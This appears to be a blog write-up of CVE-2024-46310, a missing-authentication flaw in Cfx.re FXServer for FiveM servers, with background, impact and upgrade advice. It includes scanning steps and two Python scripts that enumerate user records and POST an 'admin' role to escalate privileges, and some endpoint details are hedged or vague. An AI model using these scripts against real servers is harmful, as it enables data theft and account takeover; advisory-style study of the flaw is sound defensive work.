CVE-2024-46310 - How a Simple API Flaw in Cfx.re FXServer Exposes User Data (with Code Example and Exploit Details)
In May 2024, a severe vulnerability—tracked as CVE-2024-46310—was discovered in Cfx.re FXServer, the heart behind many FiveM Grand Theft Auto V multiplayer servers. This bug, found in all versions up to and including v9601, lets attackers read and modify arbitrary user data without any login or authentication. Basically, anyone on the internet can mess with your server’s data just by calling an open API endpoint. Let’s break down what this means, how the exploit works, and what you should do.
What Is Cfx.re FXServer?
FXServer is the engine powering FiveM, a super popular GTA V multiplayer platform. Server owners use FXServer to handle sessions, manage users, run scripts, and more. Because it hosts lots of data about users, it’s a high-profile target for attackers.
The Vulnerability: Incorrect Access Control
At the core of CVE-2024-46310 is a classic “Insecure Direct Object Reference” (IDOR) combined with missing authentication. One of the built-in API endpoints lacks proper access checks. This gives anyone on the network full read & write access to user-related data—no password, no token, nothing!
Impacted versions:
*Cfx.re FXServer v9601 and earlier (before v9602)*
The vulnerable endpoint commonly looks like this
http://<server-ip>:30120/user/<id>;
Here, <id> is the user identifier (could be a user number, SteamID, etc.). For older FXServer setups, this endpoint is exposed by default and doesn’t ask for authentication.
Server Discovery: Find target servers by scanning for the default port (typically 30120).
2. Query Endpoint: Visit /user/<id>, replacing <id> with known or guessed values.
Read Data: The response contains user info (such as Steam identifiers, playtime, roles, etc.).
4. Modify Data: Some endpoints let you send PUT or POST requests, changing data without any admin credentials.
Here’s a simple Python script that shows how the exploit works
import requests
# Replace with actual target IP or hostname
server = "http://target-server-ip:30120";
# Replace with real or guessed user ID (try user IDs from 1 to 10, for instance)
for user_id in range(1, 11):
url = f"{server}/user/{user_id}"
try:
response = requests.get(url)
if response.status_code == 200:
print(f"[+] User Data ({user_id}):\n{response.text}")
else:
print(f"[-] Failed to get user {user_id}: {response.status_code}")
except Exception as e:
print(f"Error: {e}")
If the endpoint accepts POST/PUT requests, you can modify data as well
import requests
server = "http://target-server-ip:30120";
user_id = 1
new_data = {
"role": "admin",
"banned": False
}
url = f"{server}/user/{user_id}"
resp = requests.post(url, json=new_data)
print(f"Status: {resp.status_code}, Response: {resp.text}")
Warning: Don’t attack real servers. This code is for educational, lawful testing only!
See your user database: Get identifiers, in-game stats, private info
- Change roles: Promote themselves to admin/mod
Break the trust of your player community
That’s a serious impact for game server operators.
What’s the Fix?
FXServer v9602 and later add strict authentication controls and do NOT expose these endpoints to unauthenticated requests.
Steps to protect yourself
1. Upgrade to at least FXServer v9602! (Download it here)
Ensure your API endpoints are not exposed to untrusted networks.
3. Use firewall rules to limit access to the TFServer management/API port.
References
- CVE-2024-46310 on NIST
- FiveM FXServer Artifacts (Official Download)
- Initial Security Disclosure (GitHub)
Conclusion
CVE-2024-46310 is a simple but devastating example of why access controls matter. If you run a FiveM (FXServer) instance before v9602, you must update immediately. Exposing user data and admin rights to the world is a recipe for disaster—even if it was just an oversight.
Stay safe and keep your game servers secure!
*If you want more technical deep-dives like this, follow for exclusive writeups!*
Timeline
Published on: 01/13/2025 19:15:10 UTC
Last modified on: 01/16/2025 18:15:23 UTC